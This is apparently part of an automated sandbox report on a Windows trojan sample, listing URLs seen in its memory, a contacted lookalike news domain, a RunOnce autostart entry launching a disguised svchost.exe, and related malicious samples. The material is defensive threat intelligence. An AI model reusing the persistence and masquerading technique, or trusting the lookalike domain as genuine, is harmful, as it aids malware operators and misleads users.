                                https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpgqINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                https://ads.pubmatic.com/AdServer/js/pwt/156997/3236/pwt.jsqINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                  		high
                                  https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.pngqINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-1876qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 00000015.00000003.314338575.0000023ABEC45000.00000004.00000001.sdmpfalse
                                    		high
                                    https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000015.00000002.326476300.0000023ABEC3D000.00000004.00000001.sdmpfalse
                                      		high
                                      https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpgqINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-1996166qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorstqINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      https://reachplc.hub.loginradius.com&quot;qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		low
                                      https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.pngqINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818.qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-1273716690qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000015.00000002.325607355.0000023ABEC13000.00000004.00000001.sdmp, svchost.exe, 00000015.00000002.326476300.0000023ABEC3D000.00000004.00000001.sdmpfalse
                                        		high
                                        https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-19945816qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000015.00000003.313555750.0000023ABEC60000.00000004.00000001.sdmpfalse
                                          		high
                                          https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000015.00000003.290781587.0000023ABEC30000.00000004.00000001.sdmpfalse
                                            		high
                                            https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s270b/0_GettyImages-1231353837qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://felix.data.tm-awx.com/felix.min.jsqINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000015.00000003.290781587.0000023ABEC30000.00000004.00000001.sdmpfalse
                                              		high
                                              https://dynamic.tsvchost.exe, 00000015.00000002.327217757.0000023ABEC64000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.313784192.0000023ABEC49000.00000004.00000001.sdmp, svchost.exe, 00000015.00000002.326636259.0000023ABEC42000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s180/0_Salah-Goal-vs-Leeds.jpgqINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000015.00000003.313555750.0000023ABEC60000.00000004.00000001.sdmpfalse
                                                		high
                                                https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s270b/0_RobertsonCross1.jpgqINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s458/0_GettyImages-1273716690.qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                https://www.liverpool.com/all-about/ozan-kabakqINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                https://s2-prod.mirror.co.uk/qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-qINcOlwRud.exe, 00000000.00000002.270729266.0000000002FF1000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-02-qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                https://www.liverpool.com/all-about/champions-leagueqINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                https://www.liverpool.com/all-about/curtis-jonesqINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000015.00000002.326740904.0000023ABEC4B000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://www.liverpool.com/all-about/steven-gerrardqINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000015.00000003.313784192.0000023ABEC49000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://www.liverpool.com/liverpool-fc-news/features/liverpool-ozan-kabak-future-audition-19954616qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s458/1_WhatsApp-Image-2021-03-qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://www.liverpool.com/liverpool-fc-news/features/liverpool-penalties-premier-league-var-17171391qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://schema.org/NewsArticleqINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://www.liverpool.com/schedule/qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://schema.org/BreadcrumbListqINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://securepubads.g.doubleclick.net/tag/js/gpt.jsqINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000015.00000003.313555750.0000023ABEC60000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 00000015.00000002.326476300.0000023ABEC3D000.00000004.00000001.sdmpfalse
                                                              		high
                                                              https://s2-prod.liverpool.com/qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://www.liverpool.com/liverpool-fc-news/features/liverpool-champions-league-jurgen-klopp-1996194qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s220b/0_GettyImages-1231353837qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s458/0_GettyImages-1302496803.qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 00000015.00000002.326636259.0000023ABEC42000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://felix.data.tm-awx.com/ampconfig.json&quot;qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s615/0_GettyImages-1273716690.qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s270b/0_Salah-Pressing.jpgqINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s615/0_Salah-Goal-vs-Leeds.jpgqINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s270b/0_WhatsApp-Image-2021-02qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s220b/0_RobertsonCross1.jpgqINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://www.liverpool.com/liverpool-fc-news/features/liverpool-andy-robertson-valuable-quality-19946qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://www.liverpool.com/liverpool-fc-news/features/liverpool-jurgen-klopp-pressing-tactics-1993836qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 00000015.00000003.313555750.0000023ABEC60000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?entry=svchost.exe, 00000015.00000003.290781587.0000023ABEC30000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s615/0_Salah-Pressing.jpgqINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000015.00000003.290781587.0000023ABEC30000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      http://schema.org/ListItemqINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        https://www.liverpool.com/all-about/georginio-wijnaldumqINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://myliverpoolnews.cf4qINcOlwRud.exe, 00000000.00000002.271085318.0000000003020000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://mab.data.tm-awx.com/rhs&quot;qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s180/0_GettyImages-1231353837.qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://www.liverpool.com/all-about/andrew-robertsonqINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://i2-prod.liverpool.com/incoming/article17166876.ece/ALTERNATES/s615/0_GettyImages-1175998874.qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown

                                                                        Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        104.21.56.119
                                                                        		myliverpoolnews.cfUnited States
                                                                        		13335CLOUDFLARENETUSfalse

                                                                        Private

                                                                        IP
                                                                        127.0.0.1

                                                                        General Information

                                                                        Joe Sandbox Version:31.0.0 Emerald
                                                                        Analysis ID:383942
                                                                        Start date:08.04.2021
                                                                        Start time:12:49:31
                                                                        Joe Sandbox Product:CloudBasic
                                                                        Overall analysis duration:0h 13m 17s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:light
                                                                        Sample file name:qINcOlwRud.exe
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                        Number of analysed new started processes analysed:40
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • HDC enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Critical Process Termination
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.evad.winEXE@53/25@4/2
                                                                        EGA Information:Failed
                                                                        HDC Information:
                                                                        • Successful, ratio: 3.7% (good quality ratio 0.4%)
                                                                        • Quality average: 5.9%
                                                                        • Quality standard deviation: 16.9%
                                                                        HCA Information:
                                                                        • Successful, ratio: 100%
                                                                        • Number of executed functions: 0
                                                                        • Number of non-executed functions: 0
                                                                        Cookbook Comments:
                                                                        • Adjust boot time
                                                                        • Enable AMSI
                                                                        • Found application associated with file extension: .exe
                                                                        Warnings:
                                                                        Show All
                                                                        • Exclude process from analysis (whitelisted): taskhostw.exe, WerFault.exe, SgrmBroker.exe
                                                                        • TCP Packets have been reduced to 100
                                                                        • Excluded IPs from analysis (whitelisted): 13.88.21.125, 13.64.90.137, 104.43.139.144, 95.100.54.203, 40.88.32.150, 104.42.151.234, 23.0.174.185, 23.0.174.200, 13.107.4.52, 104.83.127.80, 104.83.87.75, 13.107.42.23, 13.107.5.88
                                                                        • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, client-office365-tas.msedge.net, ocos-office365-s2s.msedge.net, config.edge.skype.com.trafficmanager.net, e-0009.e-msedge.net, config-edge-skype.l-0014.l-msedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e15275.g.akamaiedge.net, l-0014.config.skype.com, cdn.onenote.net.edgekey.net, skypedataprdcoleus15.cloudapp.net, wildcard.weather.microsoft.com.edgekey.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, www.msftconnecttest.com, prod.fs.microsoft.com.akadns.net, cdn.onenote.net, au-bg-shim.trafficmanager.net, config.edge.skype.com, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, afdo-tas-offload.trafficmanager.net, tile-service.weather.microsoft.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, v4ncsi.msedge.net, ocos-office365-s2s-msedge-net.e-0009.e-msedge.net, 4-c-0003.c-msedge.net, blobcollector.events.data.trafficmanager.net, ncsi.4-c-0003.c-msedge.net, e1553.dspg.akamaiedge.net, l-0014.l-msedge.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Report size getting too big, too many NtSetInformationFile calls found.

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        12:50:36AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce KGpXzAMpWDmcnfKnkZdJaBfAImY C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe
                                                                        12:50:44API Interceptor2x Sleep call for process: svchost.exe modified
                                                                        12:50:45AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce KGpXzAMpWDmcnfKnkZdJaBfAImY C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe
                                                                        12:50:52API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                        12:51:15API Interceptor290x Sleep call for process: qINcOlwRud.exe modified
                                                                        12:51:21API Interceptor75x Sleep call for process: powershell.exe modified

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        104.21.56.119CWlXbVUJab.exeGet hashmaliciousBrowse
                                                                        • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-C6853B6BC65431464628FF23B3F0F335.html
                                                                        lfQuSBwdSf.exeGet hashmaliciousBrowse
                                                                        • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5C52937048F55BFE92995966F69D90F1.html
                                                                        RFQ-034.exeGet hashmaliciousBrowse
                                                                        • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-F725E16D0CA14A264C99C546A5332A70.html
                                                                        BL01345678053567.exeGet hashmaliciousBrowse
                                                                        • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-67A72FE3F6CAF27B762C6C4F3939E7C8.html
                                                                        new_order20210408_14.docGet hashmaliciousBrowse
                                                                        • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A1DD2EDE961D10CC641FCFA5CF4FBAFC.html
                                                                        20200804-8293847pdf.scr.exeGet hashmaliciousBrowse
                                                                        • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-F5911AF7B418E3FBEA66B89ECBC1C287.html
                                                                        SKMC25832100083932157.jarGet hashmaliciousBrowse
                                                                        • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-8F0F96D3333F94679C552F5DEB9CE2AF.html
                                                                        SecuriteInfo.com.Artemis34DBCAD2CB5A.27289.exeGet hashmaliciousBrowse
                                                                        • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-3764A540BD56887B40989BBA8472B701.html
                                                                        PO75773937475895377.exeGet hashmaliciousBrowse
                                                                        • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A351A04B41F167E0683896E2F2337BAE.html
                                                                        New Order.exeGet hashmaliciousBrowse
                                                                        • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-1421F533C98822665897A4DD9D7F0337.html
                                                                        Payment Slip E05060_47.docGet hashmaliciousBrowse
                                                                        • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-3764A540BD56887B40989BBA8472B701.html
                                                                        Download Report.06.05.2021.exeGet hashmaliciousBrowse
                                                                        • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-F1A9BC92DE3D32C166EE1147BBB4E9DF.html
                                                                        BL836477488575.exeGet hashmaliciousBrowse
                                                                        • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-B152C1FD7F94696A3AF39D8172651AE5.html

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        myliverpoolnews.cfCWlXbVUJab.exeGet hashmaliciousBrowse
                                                                        • 104.21.56.119
                                                                        08042021New-PurchaseOrder.exeGet hashmaliciousBrowse
                                                                        • 172.67.150.212
                                                                        ETL_126_072_60.docGet hashmaliciousBrowse
                                                                        • 172.67.150.212
                                                                        IMG_102-05_78_6.docGet hashmaliciousBrowse
                                                                        • 172.67.150.212
                                                                        lfQuSBwdSf.exeGet hashmaliciousBrowse
                                                                        • 104.21.56.119
                                                                        RFQ-034.exeGet hashmaliciousBrowse
                                                                        • 104.21.56.119
                                                                        ACdEbpiSYO.exeGet hashmaliciousBrowse
                                                                        • 172.67.150.212
                                                                        Invoice_ord00000009.exeGet hashmaliciousBrowse
                                                                        • 172.67.150.212
                                                                        kayo.exeGet hashmaliciousBrowse
                                                                        • 172.67.150.212
                                                                        new_order20210408_14.docGet hashmaliciousBrowse
                                                                        • 172.67.150.212
                                                                        BL01345678053567.exeGet hashmaliciousBrowse
                                                                        • 104.21.56.119
                                                                        new_order20210408_14.docGet hashmaliciousBrowse
                                                                        • 172.67.150.212
                                                                        DHLdocument11022020680908911.exeGet hashmaliciousBrowse
